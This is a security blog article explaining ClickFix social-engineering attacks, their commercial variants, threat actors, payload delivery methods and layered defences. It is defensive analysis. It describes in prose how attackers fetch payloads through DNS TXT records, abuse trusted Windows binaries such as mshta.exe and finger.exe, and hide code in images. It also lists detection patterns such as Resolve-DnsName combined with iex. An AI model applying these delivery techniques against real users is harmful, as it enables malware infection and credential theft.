Sign in Subscribe
16 min read

ClickFix Attacks: How They Work and How to Stop Them

ClickFix Attacks: How They Work and How to Stop Them
The ClickFix Social Engineering ecosystem

Updated February 2026: Added ClickFix-as-a-Service (ErrTraffic), DNS TXT record delivery (KongTuke), CrashFix browser extension variant, ConsentFix OAuth hijacking, expanded detection guidance, and new data.

ClickFix attacks surged 517% in the first half of 2025, accounting for 8% of all blocked attacks (ESET, 2025). By late 2025, the technique had been packaged into turnkey attack platforms selling for $800 on criminal forums, with reported conversion rates near 60% (Hudson Rock, 2025). A single campaign alone has confirmed approximately 149,000 system infections through blockchain transaction tracking (Expel, 2026).

ClickFix is no longer a niche technique. See this as an industrialised attack vector used by cybercriminals, nation-state groups, and now anyone with $800 and a compromised website.

Get practical security insights delivered weekly. Subscribe to CyberDesserts for threat intelligence without the vendor spin.

Career Roadmap

How ClickFix Works

ClickFix manipulates users into executing malicious commands on their own machines (See below Common ClickFix Lures). The core mechanism exploits a gap between browser security and operating system execution that no single security tool covers completely.

The attack begins when a user visits a webpage displaying a fake verification prompt. These prompts mimic legitimate interfaces: browser error messages, document viewer issues, or human-verification challenges. The page looks convincing because attackers frequently inject them into real, compromised websites rather than building fake ones from scratch.

When the user interacts with the prompt, malicious code is silently loaded into their clipboard through JavaScript. The user is then socially engineered into opening a system execution dialogue using a keyboard shortcut and pasting the clipboard contents. That single action executes a script, typically PowerShell on Windows, that downloads and runs malware with the user's full privileges.

The entire attack takes seconds. The user has bypassed their own security controls without realising it.

macOS users face a parallel version. The same social engineering directs them to paste commands into Terminal instead of the Windows execution dialogue. Since May 2025, campaigns delivering Atomic macOS Stealer (AMOS) have targeted Mac users specifically.

Why Security Tools Struggle With ClickFix

Traditional security solutions are designed to detect malware being delivered and executed automatically. ClickFix inverts this model entirely: the user manually initiates every step.

Hudson Rock described this as the "air gap" between browser and operating system. The browser sees the user copying text to the clipboard, a legitimate action. The endpoint detection tool sees the user opening a system dialogue, also legitimate. When the user pastes and executes the code, it runs with their full privileges. Each individual action is normal. The combination is devastating.

Email security scans attachments for malicious code, but ClickFix campaigns often contain only a clean URL or HTML file that redirects to the attack page. The commands themselves are typically obfuscated one-liners that download the actual malware from attacker-controlled infrastructure. By the time the payload arrives, it is running in a user-initiated process that many tools treat as trusted activity.

This challenge compounds when attackers abuse legitimate Windows utilities. Recent campaigns use SyncAppvPublishingServer.vbs, a default Windows component modifiable only by TrustedInstaller, to proxy script execution through a trusted Microsoft binary (Blackpoint, 2026). As Marcus Hutchins noted: "Organisations and EDR are unlikely to outright block this."

For more on how attackers exploit user trust in AI interfaces through similar manipulation techniques, see our breakdown of prompt injection attacks.

The ClickFix Ecosystem: How It Evolved

ClickFix has moved from a criminal technique to an industrialised attack platform in under two years. Understanding this evolution matters because it explains why the volume is accelerating and why defences need to evolve with it.

Timeline

Date Development Source
March 2024 First observed by Proofpoint (TA571, ClearFake) Proofpoint
Mid 2024 Adopted by cybercriminal groups Multiple
Late 2024 Nation-state adoption (Kimsuky, MuddyWater, APT28) Proofpoint
H1 2025 517% surge, 8% of all blocked attacks ESET
August 2025 ClearFake infections tracked via blockchain Expel
September 2025 Social media creator targeting campaigns Hunt.io
November 2025 Steganography payload delivery observed Malwarebytes
December 2025 ErrTraffic commercialises ClickFix for $800 Hudson Rock
December 2025 ConsentFix targets OAuth tokens in-browser Push Security
January 2026 CrashFix weaponises Chrome extensions Huntress
January 2026 ClickFix builders priced $200-$1,500/month on forums The Hacker News
January 2026 SyncAppvPublishingServer.vbs LOLBin abuse Blackpoint
February 2026 DNS TXT record delivery (KongTuke) Unit 42

ClickFix-as-a-Service: The ErrTraffic Platform

The biggest shift in the ClickFix landscape happened in December 2025 when Hudson Rock researchers documented ErrTraffic, a turnkey platform that industrialises ClickFix deployment.

ErrTraffic, sold by an actor calling themselves "LenAI" on Russian-language cybercrime forums, costs $800 as a one-time purchase. The platform provides a web dashboard that mimics commercial SaaS tools, complete with campaign statistics, payload management, and targeting configuration.

The technical implementation is straightforward but effective. An attacker injects a single line of JavaScript into a compromised website. The script fingerprints each visitor's operating system and browser, then delivers a tailored attack. Windows users receive infostealers like Lumma or Vidar. Android devices get the Cerberus banking trojan. macOS targets receive AMOS variants. Linux systems receive backdoors.

The platform's signature technique is what Censys researchers termed "GlitchFix": it visually corrupts the webpage using Zalgo characters to simulate a rendering failure, making the "fix" button feel necessary and urgent. Campaign data from active ErrTraffic panels showed conversion rates approaching 60% among users who interacted with the lure (Hudson Rock, 2025).

Most concerning is the self-sustaining infection loop. The infostealers deployed through ErrTraffic capture CMS credentials, WordPress admin logins, cPanel access, and similar administrative credentials. These stolen credentials are then used to inject ErrTraffic scripts into more websites, which infect their visitors, which steal more credentials. The cycle feeds itself.

ErrTraffic includes hardcoded geofencing that excludes CIS countries (Russia, Belarus, Kazakhstan), a reliable indicator of Russian-speaking threat actor origin. Censys identified that the platform has already evolved to version 3, adding native English translations, XOR-based payload obfuscation, and additional attack modes beyond the original GlitchFix approach.

ErrTraffic is not the only option on criminal forums. Multiple ClickFix builders are now advertised at prices ranging from $200 to $1,500 per month, with variants including FileFix, JackFix, CrashFix, and GlitchFix. Some are bundled into existing malware kits alongside LNK, JavaScript, and SVG file generators.

ClickFix Variants

The ClickFix ecosystem has fragmented into specialised variants, each targeting a different attack surface.

GlitchFix corrupts website visuals using Zalgo characters to simulate rendering failures. The garbled text creates immediate anxiety, making the "fix" prompt feel like the only solution. Deployed through ErrTraffic and similar platforms.

CrashFix weaponises browser extensions. Documented by Huntress in January 2026, this variant uses a malicious Chrome extension cloned from uBlock Origin Lite. Once installed, it displays a fake security warning claiming the browser "stopped abnormally," then intentionally crashes the browser through a denial-of-service loop to create panic. The extension disables right-click and developer tools to hinder analysis. When the user follows the "fix" instructions, the attack chain uses finger.exe, a legitimate Windows utility, to retrieve a next-stage payload that delivers ModeloRAT, a previously undocumented Python RAT. Notably, ModeloRAT is only deployed to domain-joined hosts, suggesting enterprise networks are the primary target (Huntress, 2026).

ConsentFix moves the entire attack into the browser. Documented by Push Security at Black Hat Europe in December 2025, this variant tricks users into pasting a localhost URL containing an OAuth authorisation code, giving attackers control of their Microsoft account without phishing credentials or bypassing MFA. The attack targets Azure CLI, a first-party application implicitly trusted across Entra ID tenants, which severely limits available defensive controls. Push Security found that 4 in 5 ClickFix attacks they intercepted arrived via Google Search rather than email, demonstrating the shift away from traditional phishing delivery (Push Security, 2025).

KongTuke retrieves payloads from DNS TXT records. Documented by Unit 42 in February 2026, this variant uses the PowerShell Resolve-DnsName cmdlet to query attacker-controlled domains through Google's public DNS (8.8.8.8), bypassing corporate DNS filtering entirely. The traffic appears as standard DNS lookups, evading URL filters and firewalls. KongTuke is also tracked as 404 TDS, Chaya_002, LandUpdate808, and TAG-124, and has connections to both Rhysida and Interlock ransomware operations (Unit 42, 2026).

Ready to build your own SIEM for detection? See our ELK Stack Security Monitoring Tutorial for hands-on implementation.

Who Uses ClickFix

ClickFix has been adopted across the entire threat spectrum, from lone criminals to nation-state intelligence services.

Cybercriminal campaigns deliver infostealers like Lumma Stealer, DarkGate, AsyncRAT, and Danabot. The Storm-1865 campaign impersonated Booking.com to target hospitality organisations across North America, Europe, and Asia. Healthcare professionals were targeted through a compromised physical therapy video site (HEP2go) that redirected users to ClickFix prompts. The CIS (Center for Internet Security) reported that ClickFix comprised over a third of all non-malware Albert Network Monitoring alerts in the first half of 2025.

Nation-state adoption began in late 2024. Proofpoint documented campaigns from four state-sponsored groups within a three-month window:

  • Kimsuky (North Korea) targeted think tanks researching North Korean policy, posing as a Japanese diplomat to build trust before delivering ClickFix payloads that installed QuasarRAT
  • MuddyWater (Iran) impersonated Microsoft security updates, timing phishing emails to coincide with Patch Tuesday to add legitimacy
  • APT28 (Russia) used fake Google Spreadsheet prompts with reCAPTCHA-style verification
  • UNK_RemoteRogue (Russia) targeted defence contractors through compromised Zimbra servers

When nation-state actors adopt a criminal technique this quickly, it works.

Social media creators are a newer target. Hunt.io documented campaigns using fake "verified badge" offers to lure content creators. The attack chains span 115 web pages and instruct victims to copy authentication tokens from browser cookies. Victims are told "do not log out for at least 24 hours" to keep the stolen tokens valid (Hunt.io, 2025).

Ransomware operators are connected through the KongTuke infrastructure, which has links to both Rhysida and Interlock ransomware groups via the TAG-124 traffic distribution system.

Common ClickFix Lures

Attackers continuously refine their social engineering. Current campaigns use these pretexts:

  • Fake human-verification prompts displaying instructions to run commands
  • Browser update prompts claiming the page cannot display without an update
  • Document viewer errors requiring a "plugin" to view PDF or Word files
  • Video conferencing issues impersonating Google Meet or Zoom with "fix your audio/video" prompts
  • Device registration claiming the user must register their device to access content
  • Social Security Administration notices about account issues (observed June 2025)
  • Fake verified badge offers targeting social media creators (Hunt.io, September 2025)
  • Google Calendar abuse delivering ClickFix lures through calendar invitations
  • Discord-themed lures (OBSCURE#BAT campaign)
  • Malvertising on streaming sites deploying ClickFix through video player prompts

The lures exploit urgency and familiarity. Users have been conditioned to trust "fix" buttons through years of legitimate software experiences. From 2010 to 2015, Microsoft's "Fix it" solutions trained users to click automated repair prompts. Windows Troubleshooters continue this pattern today. Attackers exploit that learned behaviour: when users see a familiar "fix" button, they follow the instructions without questioning whether the source is legitimate.

The name "ClickFix" itself, coined by Proofpoint researchers in 2024, reflects this pattern. Malicious prompts almost always include a button labelled "Fix", "How to fix", or "Fix it" because attackers know users have been trained to click them.

How ClickFix Payloads Are Delivered

ClickFix is not a single delivery mechanism. The ecosystem now includes multiple technical approaches, each designed to evade specific defensive controls.

Direct Script Execution

The original and most common approach. Malicious code is loaded into the victim's clipboard through JavaScript when they interact with a fake prompt. The user then pastes and executes it through a system dialogue. The commands are typically obfuscated one-liners that download the actual malware from attacker-controlled infrastructure.

DNS TXT Record Retrieval

The KongTuke variant, documented by Unit 42 in February 2026, retrieves payloads from DNS TXT records rather than web servers. The injected command uses the Resolve-DnsName PowerShell cmdlet to query attacker-controlled domains, forcing the query through Google's public DNS (8.8.8.8) to bypass corporate DNS filtering. This makes the attack traffic appear as standard DNS lookups, evading URL filters and most network monitoring tools.

Living Off the Land Binaries

Recent campaigns abuse legitimate Windows utilities to proxy malicious execution. SyncAppvPublishingServer.vbs, a default Windows component that can only be modified by TrustedInstaller, launches PowerShell execution through a trusted Microsoft binary. Campaigns also abuse mshta.exe for HTML Application execution and finger.exe for payload retrieval. These binaries are present on most Windows systems by default and are difficult to block without impacting legitimate operations.

Image Steganography

Documented by Malwarebytes in November 2025, this technique hides malware code in image pixel data, specifically within red channel colour values. The images appear completely normal to viewers and pass standard file inspection. A script extracts, decrypts, and reconstructs the malware in memory, leaving no file on disk for antivirus tools to scan.

Blockchain-Backed Infrastructure

The ClearFake campaign uses Binance Smart Chain (BNB) smart contracts to host and retrieve malicious JavaScript. Because blockchain transactions are immutable, the malicious smart contracts cannot be taken down by traditional abuse reporting. The threat actor can update payloads by modifying the smart contract data while keeping the same entry point, providing both persistence and operational agility. Expel's analysis of blockchain transaction data tracked approximately 149,199 unique system infections from August 2025 through January 2026 (Expel, 2026). Sekoia estimated at least 9,300 websites were infected with ClearFake as of March 2025, a number likely significantly higher today.

Defence Strategies

Blocking ClickFix requires layered controls. No single tool stops it because the attack distributes its steps across multiple trust boundaries.

Technical Controls

  • Restrict PowerShell execution for non-administrative users through Group Policy
  • Block or monitor WScript.exe and mshta.exe via AppLocker or Windows Defender Application Control
  • Deploy endpoint detection rules for AMSI bypass patterns commonly used in ClickFix payloads
  • Monitor for unusual PowerShell user agents in network traffic
  • Monitor for Resolve-DnsName combined with Invoke-Expression (iex) patterns, the signature of DNS TXT record retrieval
  • Flag SyncAppvPublishingServer.vbs launching PowerShell, a strong indicator of LOLBin abuse
  • Review Chrome extensions for cloned legitimate add-ons, particularly fake ad blockers
  • Block or monitor finger.exe network connections, which should be rare in most environments
  • Check the RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU) for suspicious entries indicating system dialogue abuse

Detection Rules and Resources

For organisations running ELK or similar SIEM platforms, Florian Roth (Nextron Systems) and other detection engineers have published Sigma rules specifically targeting ClickFix behaviour patterns. Additional detection resources include:

  • Unit 42 hunting guidance for KongTuke DNS TXT record patterns and IOCs
  • Expel ClearFake detection methodology using blockchain transaction analysis and Marcus Hutchins' ClearFake Payload Extractor
  • Darktrace detection patterns for EtherHiding activity and ClearFake-related blockchain interactions
  • Censys search queries for identifying active ErrTraffic panels (using the errtraffic_session cookie as a detection signature)
  • MITRE ATT&CK mappings: T1204.001 (User Execution: Malicious Link), T1059.001 (PowerShell), T1218 (System Binary Proxy Execution)

User Awareness

  • Legitimate verification prompts never require running system commands or pasting into system dialogues
  • No website needs access to the Windows Run dialogue or Terminal
  • Commands copied from websites should never be pasted into system tools
  • Social media platforms never ask you to paste commands to verify your account or receive a verification badge
  • If a website's text appears corrupted or garbled, close the tab. Do not interact with any "fix" buttons
  • When in doubt, report the prompt to your security team rather than attempting to fix it

The Bigger Picture

ClickFix is the most significant evolution in social engineering since traditional phishing. Its effectiveness comes from exploiting the fundamental trust model that security tools rely on: if the user initiates it, it must be legitimate.

The commercialisation of ClickFix through platforms like ErrTraffic signals that this technique has crossed the threshold from specialised capability to commodity tool. When attack infrastructure costs $800 and achieves 60% conversion rates, every threat actor with a compromised website becomes a potential distributor.

The variant explosion, from GlitchFix to ConsentFix to KongTuke, shows attackers are innovating faster than defenders can adjust. ConsentFix moving entirely into the browser is particularly concerning because it renders endpoint detection irrelevant. KongTuke using DNS TXT records for payload delivery bypasses network-layer URL filtering. Each variant addresses a specific defensive control, and together they cover most of the defensive surface.

For a broader view of how social engineering techniques fit into the current threat landscape, see our AI Security Threats guide.

Summary

ClickFix has evolved from a criminal technique first observed in March 2024 into an industrialised attack ecosystem spanning cybercriminal groups, nation-state intelligence services, and now anyone with $800 to spend on a commercial attack platform.

The defence requires action across multiple layers. Restrict script execution for standard users. Deploy detection rules for the specific execution patterns ClickFix relies on, including DNS TXT record retrieval, LOLBin abuse, and clipboard-to-execution chains. Train users that no legitimate service ever asks them to paste commands into system tools. Monitor for the specific indicators: RunMRU registry modifications, unusual Resolve-DnsName activity, SyncAppvPublishingServer.vbs spawning PowerShell, and finger.exe making network connections.

The technique will continue to evolve. Defenders who understand the ecosystem, not just the individual variants, will be better positioned to detect the next iteration before it arrives.

Last updated: February 2026

Frequently Asked Questions

What is ClickFix?

ClickFix is a social engineering attack that tricks users into executing malicious commands on their own computers. Attackers use fake verification prompts or error messages to convince victims to open a system execution dialogue and paste a malicious script, typically PowerShell, that downloads malware.

How does a ClickFix attack work?

The attack uses a fake prompt on a webpage that appears to require user verification or a fix. When the user interacts with it, malicious code is silently copied to their clipboard. The user is then instructed to open a system dialogue using a keyboard shortcut, paste the contents, and execute them. This runs malware with the user's full privileges.

What malware does ClickFix deliver?

ClickFix campaigns commonly deliver infostealers like Lumma Stealer, Vidar, DarkGate, and SnakeStealer, as well as remote access trojans including AsyncRAT, QuasarRAT, ModeloRAT, and NetSupport RAT. On macOS, AMOS (Atomic Stealer) is the primary payload. The specific malware depends on the threat actor and platform.

Can ClickFix target Mac users?

Yes. Campaigns targeting macOS users have been observed since May 2025, delivering Atomic macOS Stealer (AMOS). These attacks direct users to paste commands into Terminal instead of the Windows execution dialogue. The ErrTraffic platform supports multi-OS targeting including macOS and Linux.

What is ErrTraffic?

ErrTraffic is a ClickFix-as-a-Service platform sold on criminal forums for $800. Discovered by Hudson Rock in December 2025, it automates ClickFix deployment with multi-OS payload targeting, visual page corruption (GlitchFix), and campaign analytics showing conversion rates near 60%.

What is KongTuke?

KongTuke is a ClickFix variant documented by Unit 42 in February 2026 that retrieves malicious payloads from DNS TXT records instead of web servers, making the attack traffic appear as standard DNS lookups that bypass URL filters and firewalls. It is also tracked as 404 TDS, Chaya_002, LandUpdate808, and TAG-124.

What is ConsentFix?

ConsentFix is a browser-native ClickFix variant discovered by Push Security in December 2025. It tricks users into pasting a URL containing an OAuth authorisation code, giving attackers control of their Microsoft account without phishing passwords or bypassing MFA. The attack happens entirely within the browser, making endpoint detection irrelevant.

How many systems has ClickFix infected?

A single ClearFake campaign infected approximately 149,000 systems between August 2025 and January 2026, tracked through blockchain transaction data by Expel. At least 9,300 websites were confirmed infected with ClearFake as of March 2025 (Sekoia). The CIS reported ClickFix comprised over a third of all non-malware Albert Network Monitoring alerts in the first half of 2025.

How do I protect against ClickFix?

Restrict PowerShell and script execution for standard users, deploy endpoint detection rules for ClickFix patterns, monitor for DNS TXT record retrieval and LOLBin abuse, and train employees that legitimate verification prompts never require running system commands. If a website asks you to open a system dialogue or paste commands, close the page and report it.

Are nation-states using ClickFix?

Yes. Proofpoint documented ClickFix campaigns from Kimsuky (North Korea), MuddyWater (Iran), APT28 (Russia), and UNK_RemoteRogue (Russia) between late 2024 and early 2025, targeting government, defence, and think tank organisations. Microsoft reported that 47% of attacks in their telemetry started with ClickFix in the past year.

Subscribe for Updates

Threats evolve weekly. Subscribers get practical analysis when it matters, not marketing fluff. This article is regularly updated as the ClickFix ecosystem evolves.

References and Sources

  1. ESET. (2025). H1 2025 Threat Report. ClickFix attacks increased 517%, accounting for 8% of blocked attacks. H1 2025.
  2. Proofpoint. (2025). Around the World in 90 Days: State-Sponsored Actors Try ClickFix. Documentation of nation-state adoption by Kimsuky, MuddyWater, APT28, and UNK_RemoteRogue.
  3. Proofpoint. (2024). ClickFix Social Engineering Technique Floods Threat Landscape. Initial documentation of ClickFix emergence and early campaigns by TA571 and ClearFake.
  4. Hudson Rock. (2025). The Industrialization of "ClickFix": Inside ErrTraffic. Analysis of the ErrTraffic v2 ClickFix-as-a-Service platform. December 28, 2025.
  5. Censys. (2026). ErrTraffic: Inside a GlitchFix Attack Panel. Source code breakdown, attack techniques, infrastructure mapping, and IOCs for ErrTraffic v2 and v3.
  6. Push Security. (2025). ConsentFix: Browser-Native ClickFix Hijacks OAuth Grants. Analysis of OAuth consent phishing via ClickFix-style prompts. December 11, 2025.
  7. Huntress. (2026). Dissecting CrashFix: KongTuke's New Toy. Analysis of malicious browser extension variant delivering ModeloRAT. January 2026.
  8. Unit 42 (Palo Alto Networks). (2026). KongTuke ClickFix Activity. Documentation of DNS TXT record payload delivery. February 3, 2026.
  9. Expel. (2026). ClearFake Gets More Evasive with New LOTL Techniques. Blockchain transaction analysis, infection tracking, and ClearFake Payload Extractor tool by Marcus Hutchins.
  10. Sekoia. (2025). ClearFake's New Widespread Variant: Increased Web3 Exploitation. Analysis of ClearFake infrastructure and 9,300+ infected websites. March 2025.
  11. Blackpoint. (2026). SyncAppvPublishingServer.vbs Abuse in ClickFix Campaigns. Living off the land binary abuse analysis. January 2026.
  12. Malwarebytes. (2025). Steganography in ClickFix Campaigns. Image-based payload delivery through pixel data. November 2025.
  13. Hunt.io. (2025). Social Media Creator Targeting via ClickFix. 115 web pages used in fake verified badge campaigns. September 2025.
  14. Microsoft Security. (2025). Think Before You Click(Fix). Technical analysis of ClickFix campaigns.
  15. Red Canary. (2025). Intelligence Insights: September 2025. KongTuke as top threat, tracked as 404 TDS/Chaya_002/LandUpdate808/TAG-124.
  16. Google/Mandiant. (2025). New Group on the Block: UNC5142 Leverages EtherHiding. ClearFake/CLEARSHORT framework analysis and BNB Smart Chain abuse.
  17. CIS (Center for Internet Security). (2025). ClickFix comprised over one-third of non-malware Albert Network Monitoring alerts in H1 2025.
  18. Darktrace. (2026). ClearFake: From Fake CAPTCHAs to Blockchain-Driven Payload Retrieval. Detection patterns for EtherHiding and ClearFake activity.

Member discussion